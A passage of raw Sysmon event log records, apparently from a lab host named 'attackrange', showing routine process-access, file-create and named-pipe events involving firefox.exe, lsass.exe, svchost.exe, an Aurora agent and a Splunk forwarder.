Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000048200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.991{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.5.134706918C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000048199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.976{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\d0c08ee6-a80c-454d-a688-0c376fc53fb2MD5=CDA4D24F8D02EB28544440D8E9B69C55,SHA256=E842380A20642A41824CD9E86BD2D6AA4CF8FEF3ADBC64B31579F2C26FA4B982,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.976{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\shader-cache\startup_shadersMD5=832FF40FBA1B05D29A1F8546D4B4DB21,SHA256=8B79D60DDA2DFB1A49E64CD944E3EA169B0995D96BC6EE3A9BD6C7FD89CD68CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.950{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CBDEA2FA42BEA1ABC7DF59AE9A1D8F9,SHA256=CBE02109571DCF39F1969C0B9C7B52BA2548A825B01288EFEEB1584D72F9304D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.937{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.937{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.937{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000048190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.891{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\2c0c041d-7a5f-4d4f-b99a-ae49baa8ebfdMD5=1E150B96A821038149D81F664B1D9661,SHA256=E695FC7C15CE58AC3E30644063923D67CFD979A1B1C3AB808F4FD6E289089A25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.875{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.873{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.862{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.862{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.851{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-2C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 